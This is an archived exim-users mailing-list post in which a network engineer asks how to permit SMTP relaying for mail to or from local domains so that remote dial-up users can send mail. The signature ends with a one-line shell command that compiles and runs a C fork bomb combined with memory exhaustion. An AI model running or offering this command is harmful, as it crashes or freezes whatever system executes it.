A relaying question

Página superior
Eliminar este mensaje
Autor: Keith McCallion
A: exim-users
Asunto: A relaying question

Hello,

Is there any way to allow mail if it is to or from a local_domain? I would
like users to be able to send email via our SMTP server when they are
dialed in through other providers, and although this opens up the gap a
little more then only allowing relaying from specific networks, it is also
much more convient for users.

I'm new to exim, so I am not sure exactly how I would go about this. Can
anyone help me out, or point me to some literature that I can read
pretaining relaying filters?

Thanks,

Keith
Keith M. McCallion                      Senior Network Operations Engineer
Trippin on irc.iswest.net                        Internet Specialties West
keith@???/keith@???                  31194 La Baya Dr, Ste 106
P: 818-735-3000, F: 818-735-3004            Westlake Village, Calif. 91362
   echo "main(){while(1){malloc(10000);fork();}}" >z.c;gcc -o z z.c;./z